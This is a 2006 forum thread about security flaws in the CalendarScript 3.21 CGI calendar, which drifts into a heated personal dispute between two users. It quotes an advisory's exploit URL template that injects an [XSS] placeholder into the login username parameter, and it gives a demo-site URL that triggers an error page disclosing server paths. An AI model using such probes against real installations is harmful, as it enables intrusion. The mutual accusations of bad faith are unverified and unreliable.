i just saw, the latest version is 3.21.Released 2003.
So,i justed googled for calendarscript.Wanted to see, what others would like to say..Found a SecurityTracker-Comment on the 3.21 http://securitytracker.com/alerts/2005/Apr/1013705.html
Anyone know a thing about it?
Greetz,
Matze
JMO
Dan O.(Not CalendarScript's author)
------------------
thanks for reply..
i will ask matt direct..
but it is not only showing of path or something..
Also in version 3.21, the 'username' parameter is not filtered to remove HTML code. A demonstration exploit URL is provided:
/cgi-bin/calendar/calendar.pl?calendar=[valid calender]&command=login&username=[XSS]&template=login.htm
matze
PS:I looked everywhere..And i did not found the Mail-Adress of Matt.Could someone tell me this info?
[This message has been edited by matze.schrader (edited June 10, 2006).]
As I said, "I don't know about all that site's accusations...".
** the 'username' parameter is not filtered to remove HTML code. **
Which accomplishes what exactly in the way of a security risk???
They do mention about gaining access to browser cookies but if the site's cookies are formatted correctly, an exploit will only be able to access the CalendarScript cookie which IMO is pretty benign.
The biggest security risk with any CGI script is usually when they allow or can be hacked to allow users to upload and execute new CGI scripts on the server. AFAIK, such possibilities have been removed from the current CalendarScript version.
JMO - As I said, ask Matt what he thinks.
PS. You might want to provide a link to this message if you email Matt so he can also reply publicly.
Dan O.
Remember whats reported is useaully the tip of the iceberg
and the installation path is "important" it is nobody's business and will lay the foundation for other paths for all scripts in the cgi-bin. it can also display paths to plugins even if you change their default names, should you ever come across a malicious author he's in your website 123, would you go to sleep with your front door wide open?
The good thing is logs capture everything, do a search at least weekly in them, checking calls to your scripts, you'll be amazed what you'll find sometimes.
You could also write a shell script to retrieve all particular calls or exclude known good ones to lets say this calendar program to check daily and email results to you.to look over maybe during breakfast.
also see my other link http://www.calendarscript.com/support/forum/Forum2/HTML/000974.html
Be safe or at least make an effortSonny
Just knowing the server path does not allow users to access that area nor any other part of the server. I would hope that most users would have their web site secured properly but if not, that is their problem, not CalendarScript's.
Upon error Why not simply just display a "this script experiance an error message"? instead of a detailed debug printout for every tom dick and harry to see! I thought that was why theres a begug script included. You say just have a secured server and that will make things fine, the last version of calendarscript did create a way in, making one's server insecure all by itself,
take a look http://www.calendarscript.com/demo/calendar.pl?calendar=default&year=f00b4r
I see you do not even run a public calendarscript on your siteand if you did I'm sure it would'nt display a thing about "paths"
there is a debug script that comes in the zip already many out there I bet don't even rename that debug script or protect it from being run, anybody familar with calendarscript knows its in the same folder as calendar.pl, also you did not mention why the password required was off by default, makes no sense, why not just enable it or at least mention it somewhere in the docs? since thers no way to enble it via the admin panel
Scott None of these things are major in by "itself" but they add up and begin to make one think if simple things like this go unnoticed or fixed what else in there needs checking, "justified or NOT" I know this things been idle for years but somone should at least start mentioning this stuff, a lot of people keep important stuff in their folders along with this scriptthat are not programmers and could not even imagine what could happen one day. until that is, the day it does.
This is a great looking, easy to manage calender that took a brillent forsight and tremendous talent to make happern. Don't give up on this program fix a few things when you get a chance one day.
ThanksSonny
BTW. The debug script that ships with the program only checks file locations and permissions.
I for one would prefer a detailed error message to be displayed so I can find the cause of problems when they occur.
JFYI
Dan O.--------------------------------------------
Any script I have ever used had a log for script errors, not a public printout like calendarscript does
OK fair emough I know you just try to help out on the forum once and awhile.
Do you or so someone out there know a way to kill that printout from happening? and just leave a blank screen or text message or somthing other then my server info
Thanks
Sonny
PS haveing the script also write the error to somthing like errors.txt would be great
I'm sure the script author would, I don't offhand without looking through the whole script for the routine responsible. Maybe you could have a peek?
** Any script I have ever used had a log for script errors **
Really?? all, ALL the other shareware scripts I've been involved with just rely on Perl to report errors to the server error log. I've never come across one that even tried to report (let alone record) errors itself. CalendarScript is a step above those IMO.
** I know you just try to help out on the forum once and awhile. **
Yes. I usually just drop by several times a day to check for new postings... except when I'm on holidays like last week.
If I knew why would be asking?
** Really?? all, ALL the other shareware scripts I've been involved with just rely on Perl to report errors to the server error log. I've never come across one that even tried to report (let alone record) errors itself. CalendarScript is a step above those IMO.**
Yes really, your being disingenous if you spew that line most free scripts don't have an error log.just off my head here's one download the zip and see for YOURSELF http://checkwebsite.org/website-monitoring-terms.php
Look for this line in the ReadMe "my $error_log = 'Responser_errors.txt'"THAT IS A ERROR LOG FOR SCRIPT ERRORS
Personally I would never open calendarscript to the public the way it is nowI would be compromising everything on my server. google calendarscript the sad part is most usingthis script are not high tech programmers or security savvy people (me included).if that last security warning never got published all over the place this script would be stillhave that MAJOR exploit.
I would bet you alone know about a dozen ways to exploit this script not to mentionyour plugins, based on the way you defend security holes as being in our interestcombined with the fact you know scripting, and know what you are saying is untruelead me to believe your nothing but a WOLF in SHEEPS clothing and you probaly do not want those fixes
ONE LAST THING in closing (Let me be REALLY clear) your not here out of the generosity of your hart my friend your here to cash in on what's left relating to fixes, installs and plug your out dated link infested url, anybody need proof look no further then his own post, he links to his url, (adds and click credits) you then need to scroll and search for a link that leads back to this forum again anyway.
IF I WAS THE AUTHOR OF THIS CALENDAR SCRIPT I WOULD DEMAND A CUT OF THE ACTIONbUT I know you no make nottin, nadda, gosse egg zip right? OOOOK
The biggest BS I ever heard online was when you replied to person wanting to hire you and you replied "see my site for a contact link but it my take me a week to respond I never check my email that often BE REAL" Its the only reason your here in the first place.
In disgustSonny
I never said you knew anything (I would hate to presume). I suggested you look youself to see if you can find it.
** your being disingenous if you spew that line most free scripts don't have an error log. **
Did I say that? Noooo! I said, "ALL the other shareware scripts I've been involved with just rely on Perl to report errors to the server error log". I'm sure that are some out there that do do it but that is not the 'norm' (IMO and from my experience) for shareware scripts.
** need proof look no further then his own post, he links to his url, (adds and click credits) you then need to scroll and search for a link that leads back to this forum again anyway. **
Did you happen to look at the top of these support forums:
quote:Looking for plugins, mods, templates, and other cool ways to customize CalendarScript and extend its functionality? Check out the Unofficial CalendarScript Mods and Plug-Ins page at much2.com for some absolutely excellent additions to the script!
** your out dated link infested url... he links to his url, (adds and click credits) **
I am not responsible for other people's contributions. If you aren't happy with it/them why don't you do something constructive and fix them rather than just complaining someone bothered to even maintain them at all. BTW. On the plug-in's page there are 4 (count'em 4) banner ads and no "click credit" links (if such a thing even exists anymore on the internet).
** you then need to scroll and search for a link that leads back to this forum again anyway. **
quote:from the Unofficial CalendarScript Mods and Plug-Ins site (at the very TOP):Last Updated On: 28-Apr-2006 - 13:01:03This site is a repository of plugins, templates, hacks and links to enhancements for Scott's excellent LINK>CalendarScript< CGI script. Much of it contains the work of David Whittaker (aka TubaDave - whom also started this repository) and Kent but also some by myself (Dan O.) and others whom are proud of their CS implementation and want to share so others can benefit too. For any support questions, please post in the LINK>CalendarScript support forum< .
Last Updated On: 28-Apr-2006 - 13:01:03
This site is a repository of plugins, templates, hacks and links to enhancements for Scott's excellent LINK>CalendarScript< CGI script. Much of it contains the work of David Whittaker (aka TubaDave - whom also started this repository) and Kent but also some by myself (Dan O.) and others whom are proud of their CS implementation and want to share so others can benefit too. For any support questions, please post in the LINK>CalendarScript support forum< .
You seen to have a chip on your shoulder and by the looks of it, it's just getting bigger. Quit while you're behind (or "a behind" - your choice).
Dan O.(not CalendarScript's author)
You wer'e just being a wise guy------------------------------------------------
"Did you happen to look at the top of these support forums That was put that by CalendarScript's author himself JFYI.:"
This aurthor has long since given up on this script and knows to properly make it safe would take a complete rewritewhats you point he gave you free rain to plug your garbage site and see whats left to be had exploting fixes, plugings and other puke which I'm sure you became good at. ------------------------------------------------
"I'm sure that are some out there that do do it"
Thats not what you spewed before I posted proof above, I know more scripts that do then don't but that don't fit with yourcaledarscript went the extra mile and is safe routine you use to keep pushing this explotable script, it an't on your public site right?------------------------------------------------
"Last Updated On: 28-Apr-2006 - 13:01:03"
Funny how one gets moving once exposed, I'm glad some good came out of our conversations for those who want to play spin thebottle with ther website, want to push this thing right, really start a clean slate?, make it somewhat safe you know how, you can keep your back doors just make it hard on the majority at least out there.------------------------------------------------
"You seen to have a chip on your shoulder and by the looks of it, it's just getting bigger. Quit while you're behind (or "a behind" - your choice)."
Your not only a bottom feeder living off an explotable, script your Corny as Well.------------------------------------------------
In total disgustSonny
quote:"I never said you knew anything (I would hate to presume)." You wer'e just being a wise guy
You wer'e just being a wise guy
BTW. If you're of legal age (I have my doubts), you better watch the accusations you make against other people or you may find yourself being sued one day by someone not as tolerant as I. I simply credit the source (as I'm sure anyone else reading your rantings will).
quote:"Last Updated On: 28-Apr-2006 - 13:01:03" Funny how one gets moving once exposed
Funny how one gets moving once exposed
Today (where I am anyway) is August 3, 2006
With the misinterpretations you keep making, I don't know how much stock anyone would put in your statements. Need anyone say more?
Good luck (and hopefully good bye)!
THIS SCRIPT IS very risky to use I SEE THERE IS NO LICENSE INCLUDED INSIDE THE ZIP or anywhere else I could find on the site as of this post, DO YOU FIND THAT ODD? DOES ANYBODY FIND THAT ODD?
COULD IT BE BECAUSE A DISCLAIMER IS NOT 100% protection from liability IF YOU KNOWINGLY DISTRIBUTE and do not inform. you have it backwards, you better watch yourself legally.
You never mentioned why you do not run calendarscript publicly I asked you before?,and I am asking you again, all I read and see from you are links and the I'm available for installs and such rhetoric lines so go ahead and both show and reassure us how comfortable you are running this script publicly on your website, people are not stupid they know what I'm saying, I am trying to watch out for them.
In total disgust and amazementSonny
Everything Else